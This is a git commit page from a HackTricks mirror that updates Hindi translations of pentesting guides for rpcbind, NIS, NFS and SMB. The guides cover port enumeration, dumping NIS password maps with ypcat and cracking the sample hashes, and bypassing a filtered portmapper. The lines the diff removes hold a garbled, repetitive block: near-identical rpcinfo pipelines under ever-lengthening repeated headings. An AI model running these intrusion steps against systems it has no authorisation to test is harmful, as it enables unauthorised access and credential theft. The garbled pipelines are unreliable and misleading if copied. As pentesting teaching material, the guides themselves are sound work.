Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-15 09:27:32 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['network-services-pentesting/pentesting-mssql-microsoft-sql-

Browse source
This commit is contained in:
Translator 2024-01-03 02:57:05 +00:00
parent c9d411b8ce
commit 2a8443920d
23 changed files with 1461 additions and 1919 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

248
network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
View file

File diff suppressed because one or more lines are too long

160
network-services-pentesting/pentesting-rpcbind.md
View file

@ -2,141 +2,57 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS रेड टीम एक्सपर्ट)</strong></a><strong> के साथ!</strong></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को।**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर **मुझे फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.
</details>
## मूलभूत जानकारी
## मूल जानकारी
यूनिक्स आधारित सिस्टमों के बीच जानकारी प्रदान करता है। पोर्ट अक्सर परीक्षण किया जाता है, इसका उपयोग एनिक्स ओएस को फिंगरप्रिंट करने और उपलब्ध सेवाओं के बारे में जानकारी प्राप्त करने के लिए किया जा सकता है। NFS, NIS या किसी भी आरपीसी-आधारित सेवा के साथ उपयोग होने वाला पोर्ट
Unix आधारित सिस्टम्स के बीच जानकारी प्रदान करता है। पोर्ट अक्सर जांचा जाता है, इसका उपयोग Nix OS की पहचान करने और उपलब्ध सेवाओं के बारे में जानकारी प्राप्त करने के लिए किया जा सकता है। पोर्ट NFS, NIS, या किसी भी rpc-आधारित सेवा के साथ उपयोग किया जाता है
**डिफ़ॉल्ट पोर्ट:** 111/TCP/UDP, Oracle Solaris में 32771
```
PORT STATE SERVICE
111/tcp open rpcbind
```
## जांच
RPCBind सेवा को जांचने के लिए निम्नलिखित तकनीकों का उपयोग किया जा सकता है:
### RPCBind का स्कैन करें
```bash
nmap -p 111 <target>
```
### RPCBind के लिए रिमोट प्रोटोकॉल टेबल देखें
```bash
rpcinfo -p <target>
```
### RPCBind के लिए रिमोट प्रोटोकॉल टेबल का विस्तारित रूप देखें
```bash
rpcinfo -p <target> | grep -v "udp" | awk '{print $2}' | sort -u | xargs -I {} rpcinfo -p <target> {} | grep -v "udp"
```
### RPCBind के लिए रिमोट प्रोटोकॉल टेबल का विस्तारित रूप देखें (विस्तारित जानकारी के साथ)
```bash
rpcinfo -p <target> | grep -v "udp" | awk '{print $2}' | sort -u | xargs -I {} rpcinfo -p <target> {} | grep -v "udp" -A 2
```
### RPCBind के लिए रिमोट प्रोटोकॉल टेबल का विस्तारित रूप देखें (विस्तारित जानकारी के साथ, विशेषता को छोड़ें)
```bash
rpcinfo -p <target> | grep -v "udp" | awk '{print $2}' | sort -u | xargs -I {} rpcinfo -p <target> {} | grep -v "udp" -A 2 | grep -v "AUTH"
```
### RPCBind के लिए रिमोट प्रोटोकॉल टेबल का विस्तारित रूप देखें (विस्तारित जानकारी के साथ, विशेषता को छोड़ें, विशेषता को छोड़ें)
```bash
rpcinfo -p <target> | grep -v "udp" | awk '{print $2}' | sort -u | xargs -I {} rpcinfo -p <target> {} | grep -v "udp" -A 2 | grep -v "AUTH" | grep -v "NULL"
```
### RPCBind के लिए रिमोट प्रोटोकॉल टेबल का विस्तारित रूप देखें (विस्तारित जानकारी के साथ, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें)
```bash
rpcinfo -p <target> | grep -v "udp" | awk '{print $2}' | sort -u | xargs -I {} rpcinfo -p <target> {} | grep -v "udp" -A 2 | grep -v "AUTH" | grep -v "NULL" | grep -v "SECURE"
```
### RPCBind के लिए रिमोट प्रोटोकॉल टेबल का विस्तारित रूप देखें (विस्तारित जानकारी के साथ, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें)
```bash
rpcinfo -p <target> | grep -v "udp" | awk '{print $2}' | sort -u | xargs -I {} rpcinfo -p <target> {} | grep -v "udp" -A 2 | grep -v "AUTH" | grep -v "NULL" | grep -v "SECURE" | grep -v "GSSAPI"
```
### RPCBind के लिए रिमोट प्रोटोकॉल टेबल का विस्तारित रूप देखें (विस्तारित जानकारी के साथ, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें)
```bash
rpcinfo -p <target> | grep -v "udp" | awk '{print $2}' | sort -u | xargs -I {} rpcinfo -p <target> {} | grep -v "udp" -A 2 | grep -v "AUTH" | grep -v "NULL" | grep -v "SECURE" | grep -v "GSSAPI" | grep -v "KRB5"
```
### RPCBind के लिए रिमोट प्रोटोकॉल टेबल का विस्तारित रूप देखें (विस्तारित जानकारी के साथ, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें)
```bash
rpcinfo -p <target> | grep -v "udp" | awk '{print $2}' | sort -u | xargs -I {} rpcinfo -p <target> {} | grep -v "udp" -A 2 | grep -v "AUTH" | grep -v "NULL" | grep -v "SECURE" | grep -v "GSSAPI" | grep -v "KRB5" | grep -v "SPKM3"
```
### RPCBind के लिए रिमोट प्रोटोकॉल टेबल का विस्तारित रूप देखें (विस्तारित जानकारी के साथ, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें)
```bash
rpcinfo -p <target> | grep -v "udp" | awk '{print $2}' | sort -u | xargs -I {} rpcinfo -p <target> {} | grep -v "udp" -A 2 | grep -v "AUTH" | grep -v "NULL" | grep -v "SECURE" | grep -v "GSSAPI" | grep -v "KRB5" | grep -v "SPKM3" | grep -v "SCM"
```
### RPCBind के लिए रिमोट प्रोटोकॉल टेबल का विस्तारित रूप देखें (विस्तारित जानकारी के साथ, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें)
```bash
rpcinfo -p <target> | grep -v "udp" | awk '{print $2}' | sort -u | xargs -I {} rpcinfo -p <target> {} | grep -v "udp" -A 2 | grep -v "AUTH" | grep -v "NULL" | grep -v "SECURE" | grep -v "GSSAPI" | grep -v "KRB5" | grep -v "SPKM3" | grep -v "SCM" | grep -v "NS"
```
### RPCBind के लिए रिमोट प्रोटोकॉल टेबल का विस्तारित रूप देखें (विस्तारित जानकारी के साथ, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें)
```bash
rpcinfo -p <target> | grep -v "udp" | awk '{print $2}' | sort -u | xargs -I {} rpcinfo -p <target> {} | grep -v "udp" -A 2 | grep -v "AUTH" | grep -v "NULL" | grep -v "SECURE" | grep -v "GSSAPI" | grep -v "KRB5" | grep -v "SPKM3" | grep -v "SCM" | grep -v "NS" | grep -v "BROADCAST"
```
### RPCBind के लिए रिमोट प्रोटोकॉल टेबल का विस्तारित रूप देखें (विस्तारित जानकारी के साथ, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें, विशेषता को छोड़ें)
```bash
rpcinfo -p <target> | grep -v "udp" | awk '{print $2}' | sort -u | xargs -I {} rpcinfo -p <target> {} | grep -v "udp" -A 2 | grep -v "AUTH" | grep -v "NULL" | grep -v "SECURE" | grep -v "GSSAPI" | grep -v "KRB5" | grep -v "SPKM3" | grep -v "SCM" | grep -v "NS" | grep -v "BROADCAST" | grep -v "PRES"
```
## एन्यूमरेशन
```
rpcinfo irked.htb
nmap -sSUC -p111 192.168.10.1
```
कभी-कभी यह आपको कोई जानकारी नहीं देता है, अन्य समयों में आपको इस तरह की कुछ ऐसा मिलेगा:
कभी-कभी यह आपको कोई जानकारी नहीं देता है, अन्य अवसरों पर आपको ऐसा कुछ मिल सकता है:
![](<../.gitbook/assets/image (230).png>)
### शो
### शोडन
* `port:111 portmap`
## RPCBind + NFS
यदि आप सेवा NFS पाते हैं तो शायद आप फ़ाइलों की सूची बना सकते हैं और उन्हें डाउनलोड (और शायद अपलोड) कर सकते हैं:
यदि आपको NFS सेवा मिलती है, तो संभवतः आप सूची बना सकते हैं और फाइलें डाउनलोड (और शायद अपलोड) कर सकते हैं:
![](<../.gitbook/assets/image (232).png>)
इस प्रोटोकॉल को कैसे टेस्ट करना है इसके बारे में अधिक जानने के लिए [2049 - NFS सेवा का पेंटेस्टिंग](nfs-service-pentesting.md) पढ़ें।
NFS प्रोटोकॉल का परीक्षण कैसे करें, इसके बारे में जानने के लिए [2049 - NFS सेवा का पेंटेस्टिंग](nfs-service-pentesting.md) पढ़ें।
## NIS
यदि आप `ypbind` सेवा चल ही है तो:
यदि आपको `ypbind` सेवा चलती हुई मिलती है:
![](<../.gitbook/assets/image (233).png>)
आप इसे उत्पन्न करने की कोशिश कर सकते हैं। फिर भी, सबसे पहले आपको मशीन के NIS "डोमेन नाम" को अनुमान लगाने की आवश्यकता होगी (जब NIS स्थापित होता है तो एक "डोमेन नाम" को कॉन्फ़िगर किया जाता है) और **इस डोमेन नाम को नहीं जानते हुए आप कुछ नहीं कर सकते**।
आप इसका शोषण करने का प्रयास कर सकते हैं। वैसे, सबसे पहले आपको मशीन का NIS "डोमेन नाम" **अनुमान लगाना होगा** (जब NIS स्थापित किया जाता है तो एक "डोमेन नाम" कॉन्फ़िगर किया जाता है) और **इस डोमेन नाम को जाने बिना आप कुछ भी नहीं कर सकते**
पर्याप्त NIS डोमेन नाम प्राप्त करने के बाद (इस मामले में example.org), ypwhich कमांड का उपयोग करके NIS सर्वर को पिंग करें और ypcat का उपयोग करके संवेदनशील सामग्री प्राप्त करें। आपको John the Ripper में एन्क्रिप्टेड पासवर्ड हैश देना चाहिए, और एक बार क्रैक हो जाने पर, आप इस सिस्टम एक्सेस और विशेषाधिकारों का मूल्यांकन करने के लिए उपयोग कर सकते हैं।
पर्यावरण के लिए NIS डोमेन नाम प्राप्त करने पर (इस मामले में example.org), NIS सर्वर को पिंग करने के लिए ypwhich कमांड का उपयोग करें और संवेदनशील सामग्री प्राप्त करने के लिए ypcat का उपयोग करें। आपको जॉन द रिपर में एन्क्रिप्टेड पासवर्ड हैशेस को फीड करना चाहिए, और एक बार क्रैक हो जाने पर, आप इसका उपयोग सिस्टम एक्सेस और विशेषाधिकारों का मूल्यांकन करने के लिए कर सकते हैं।
```bash
root@kali:~# apt-get install nis
root@kali:~# ypwhich -d example.org 192.168.10.1
@ -149,32 +65,32 @@ florent:nUNzkxYF0Hbmk:199:100::/export/home/florent:/bin/csh
dave:pzg1026SzQlwc:182:100::/export/home/dave:/bin/bash
yumi:ZEadZ3ZaW4v9.:1377:160::/export/home/yumi:/bin/bash
```
| **मास्टर फ़ाइल** | **मानचित्र(एस)** | **नोट्स** |
| **मास्टर फाइल** | **मैप(s)** | **नोट्स** |
| ---------------- | --------------------------- | --------------------------------- |
| /etc/hosts | hosts.byname, hosts.byaddr | होस्टनेम और आईपी विवरण शामिल हैं |
| /etc/passwd | passwd.byname, passwd.byuid | NIS उपयोगकर्ता पासवर्ड फाइल |
| /etc/group | group.byname, group.bygid | NIS समूह फाइल |
| /usr/lib/aliases | mail.aliases | मेल उपनामों का विवरण |
| /etc/hosts | hosts.byname, hosts.byaddr | होस्टनेम और IP विवरण शामिल हैं |
| /etc/passwd | passwd.byname, passwd.byuid | NIS उपयोगकर्ता पासवर्ड फाइल |
| /etc/group | group.byname, group.bygid | NIS समूह फाइल |
| /usr/lib/aliases | mail.aliases | मेल उपनामों का विवरण |
## RPC उपयोगकर्ता
यदि आपको इस तरह से दिखाई देती है **rusersd** सेवा:
यदि आपको **rusersd** सेवा इस प्रकार सूचीबद्ध मिलती है:
![](<../.gitbook/assets/image (231).png>)
तो आप बॉक्स के उपयोगकर्ताओं को गणना कर सकते हैं। इसे सीखने के लिए पढ़ें [1026 - Pentesting Rsusersd](1026-pentesting-rusersd.md).
आप बॉक्स के उपयोगकर्ताओं का अनुक्रमण कर सकते हैं। कैसे सीखने के लिए [1026 - Pentesting Rsusersd](1026-pentesting-rusersd.md) पढ़ें।
## फ़िल्टर किए गए पोर्टमैपर पोर्ट को छोड़ें
## फ़िल्टर किए गए Portmapper पोर्ट को बायपास करें
यदि आपको nmap स्कैन के दौरान NFS जैसे खुले पोर्ट दिखाई देते हैं लेकिन पोर्ट 111 फ़िल्टर है, तो आप उन पोर्टों का शोधन करने में सक्षम नहीं होंगे।\
लेकिन, यदि आप अपनी मशीन पर स्थानिक रूप से एक पोर्टमैपर सेवा का नकली बना सकते हैं और आप अपनी मशीन से आपत्ति जनित व्यक्ति तक NFS पोर्ट को टनल कर सकते हैं, तो आप नियमित उपकरणों का उपयोग करके उन सेवाओं का शोधन कर सकेंगे।\
अधिक जानकारी के लिए [https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc) पर जाएं
यदि आपको nmap स्कैन के दौरान NFS जैसे खुले पोर्ट दिखाई देते हैं लेकिन पोर्ट 111 फ़िल्टर किया गया है, तो आप उन पोर्टों का शोषण नहीं कर पाएंगे।\
लेकिन, यदि आप स्थानीय रूप से एक portmapper सेवा का अनुकरण कर सकते हैं और आप NFS पोर्ट को अपनी मशीन से पीड़ित वाले तक टनल कर सकते हैं, तो आप उन सेवाओं का शोषण करने के लिए नियमित उपकरणों का उपयोग कर पाएंगे।\
अधिक जानकारी के लिए [https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc)
## शोडन
## Shodan
* `Portmap`
## अभ्यास करने के लिए लैब
## अभ्यास के लिए लैब्स
* [**Irked HTB मशीन**](https://app.hackthebox.com/machines/Irked) में इन तकनीकों का अभ्यास करें।
@ -204,12 +120,14 @@ Command: nmap -sSUC -p 111 {IP}
```
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का पालन करें।**
* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके अपना योगदान दें।**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details>

92
network-services-pentesting/pentesting-smb.md
View file

@ -2,25 +2,27 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप HackTricks में अपनी **कंपनी का विज्ञापन देखना चाहते हैं**? या क्या आप PEASS के **नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सदस्यता योजनाओं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **hacktricks repo** में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें और [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**.
* **अपनी हैकिंग ट्रिक्स साझा करें PRs जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में.
</details>
## **Port 139**
**NetBIOS** का मतलब _Network Basic Input Output System_ है। यह एक सॉफ्टवेयर प्रोटोकॉल है जो एप्लिकेशन, पीसी, और डेस्कटॉप को एक स्थानीय क्षेत्र नेटवर्क (LAN) पर नेटवर्क हार्डवेयर के साथ संवाद करने और नेटवर्क के आर-पार डेटा प्रेषित करने की अनुमति देता है। NetBIOS नेटवर्क पर चलने वाले सॉफ्टवेयर एप्लिकेशन अपने NetBIOS नामों के माध्यम से एक दूसरे को खोजते और पहचानते हैं। एक NetBIOS नाम 16 अक्षरों तक लंबा होता है और आमतौर पर, कंप्यूटर नाम से अलग होता है। दो एप्लिकेशन एक NetBIOS सत्र शुरू करते हैं जब एक (क्लाइंट) दूसरे क्लाइंट (सर्वर) को **TCP Port 139** पर "कॉल" करने का आदेश भेजता है। (यहाँ से निकाला गया [here](https://www.thewindowsclub.com/smb-port-what-is-port-445-port-139-used-for))
**NetBIOS** का मतलब है _Network Basic Input Output System_. यह एक सॉफ्टवेयर प्रोटोकॉल है जो एप्लिकेशन्स, पीसी, और डेस्कटॉप्स को एक स्थानीय क्षेत्र नेटवर्क (LAN) पर नेटवर्क हार्डवेयर के साथ संवाद करने और नेटवर्क के आर-पार डेटा ट्रांसमिट करने की अनुमति देता है। NetBIOS नेटवर्क पर चलने वाले सॉफ्टवेयर एप्लिकेशन्स अपने NetBIOS नामों के माध्यम से एक दूसरे को खोजते और पहचानते हैं। एक NetBIOS नाम 16 अक्षरों तक लंबा होता है और आमतौर पर, कंप्यूटर नाम से अलग होता है। दो एप्लिकेशन्स एक NetBIOS सत्र शुरू करते हैं जब एक (क्लाइंट) दूसरे क्लाइंट (सर्वर) को **TCP Port 139** पर “कॉल” करने का कमांड भेजता है। (यहाँ से निकाला गया [here](https://www.thewindowsclub.com/smb-port-what-is-port-445-port-139-used-for))
```
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
```
## पोर्ट 445
जहां पोर्ट 139 को तकनीकी रूप से 'NBT over IP' के रूप में जाना जाता है, पोर्ट 445 को 'SMB over IP' कहा जाता है। **SMB** का अर्थ है '**सर्वर मैसेज ब्लॉक्स**'। आधुनिक भाषा में सर्वर मैसेज ब्लॉक को **कॉमन इंटरनेट फाइल सिस्टम** के रूप में भी जाना जाता है। यह प्रणाली मुख्य रूप से फाइलों, प्रिंटरों, सीरियल पोर्ट्स, और नेटवर्क पर नोड्स के बीच अन्य प्रकार के संचार के साझा उपयोग की पेशकश के लिए एक एप्लिकेशन-लेयर नेटवर्क प्रोटोकॉल के रूप में काम करती है।
जहां पोर्ट 139 को तकनीकी रूप से 'NBT over IP' के रूप में जाना जाता है, पोर्ट 445 को 'SMB over IP' कहा जाता है। **SMB** का अर्थ है '**सर्वर मैसेज ब्लॉक्स**'। आधुनिक भाषा में सर्वर मैसेज ब्लॉक को **कॉमन इंटरनेट फाइल सिस्टम** के रूप में भी जाना जाता है। यह सिस्टम एक एप्लिकेशन-लेयर नेटवर्क प्रोटोकॉल के रूप में काम करता है जिसका मुख्य उपयोग फाइलों, प्रिंटरों, सीरियल पोर्ट्स, और नेटवर्क पर नोड्स के बीच अन्य प्रकार के संचार के लिए साझा एक्सेस प्रदान करना है।
उदाहरण के लिए, विंडोज पर, SMB सीधे TCP/IP के ऊपर चल सकता है बिना NetBIOS over TCP/IP की आवश्यकता के। इसके लिए, जैसा कि आपने बताया, पोर्ट 445 का उपयोग होगा। अन्य सिस्टम्स पर, आपको पोर्ट 139 का उपयोग करने वाली सेवाएं और एप्लिकेशन मिलेंगी। इसका मतलब है कि SMB NetBIOS over TCP/IP के साथ चल रहा है। (यहां से निकाला गया [here](https://www.thewindowsclub.com/smb-port-what-is-port-445-port-139-used-for))
```
@ -28,16 +30,16 @@
```
### SMB
सर्वर मैसेज ब्लॉक (`SMB`) एक **क्लाइंट-सर्वर** प्रोटोकॉल है जो **फाइलों तक पहुंच** और पूरी डायरेक्टरीज और अन्य नेटवर्क संसाधनों जैसे प्रिंटर, राउटर, या नेटवर्क के लिए जारी इंटरफेसेस को नियंत्रित करता है। इस प्रोटोकॉल का मुख्य अनुप्रयोग क्षेत्र विशेष रूप से **विंडोज** ऑपरेटिंग सिस्टम श्रृंखला रहा है, जिसकी नेटवर्क सेवाएं नीचे की ओर संगत तरीके से SMB का समर्थन करती हैं - जिसका अर्थ है कि नए संस्करणों वाले उपकरण आसानी से उन उपकरणों के साथ संवाद कर सकते हैं जिनमें पुराना माइक्रोसॉफ्ट ऑपरेटिंग सिस्टम स्थापित है।\
मुक्त सॉफ्टवेयर परियोजना **सांबा** के साथ, एक समाधान भी है जो **SMB in Linux** और Unix वितरणों में उपयोग की अनुमति देता है और इस प्रकार SMB के माध्यम से क्रॉस-प्लेटफॉर्म संचार सक्षम करता है।
सर्वर मैसेज ब्लॉक (`SMB`) एक **क्लाइंट-सर्वर** प्रोटोकॉल है जो **फाइलों तक पहुंच** और पूरी डायरेक्टरीज और अन्य नेटवर्क संसाधनों जैसे प्रिंटर, राउटर, या नेटवर्क के लिए जारी इंटरफेसेस को नियंत्रित करता है। इस प्रोटोकॉल का मुख्य अनुप्रयोग क्षेत्र विशेष रूप से **Windows** ऑपरेटिंग सिस्टम श्रृंखला रहा है, जिसकी नेटवर्क सेवाएं नीचे की ओर संगत तरीके से SMB का समर्थन करती हैं - जिसका अर्थ है कि नए संस्करणों वाले उपकरण आसानी से उन उपकरणों के साथ संवाद कर सकते हैं जिनमें पुराना Microsoft ऑपरेटिंग सिस्टम स्थापित है।\
मुक्त सॉफ्टवेयर परियोजना **Samba** के साथ, एक समाधान भी है जो **SMB in Linux** और Unix वितरणों में उपयोग की अनुमति देता है और इस प्रकार SMB के माध्यम से क्रॉस-प्लेटफॉर्म संचार सक्षम करता है।
एक SMB सर्वर अपनी स्थानीय फाइल सिस्टम के **मनमाने भागों को शेयर्स के रूप में प्रदान कर सकता है**। इसलिए क्लाइंट को दिखाई देने वाली **हायरार्की** आंशिक रूप से **स्वतंत्र** होती है **सर्वर** पर **संरचना** से। **पहुंच अधिकार** `Access Control Lists` (`ACL`) द्वारा परिभाषित किए जाते हैं। वे **बारीकी से नियंत्रित** किए जा सकते हैं व्यक्तिगत उपयोगकर्ताओं या उपयोगकर्ता समूहों के लिए **`execute`**, **`read`**, और **`full access`** जैसे गुणों के आधार पर। **ACLs** **शेयर्स के आधार पर** परिभाषित किए जाते हैं और इसलिए सर्वर पर स्थानीय रूप से सौंपे गए अधिकारों से मेल नहीं खाते हैं।
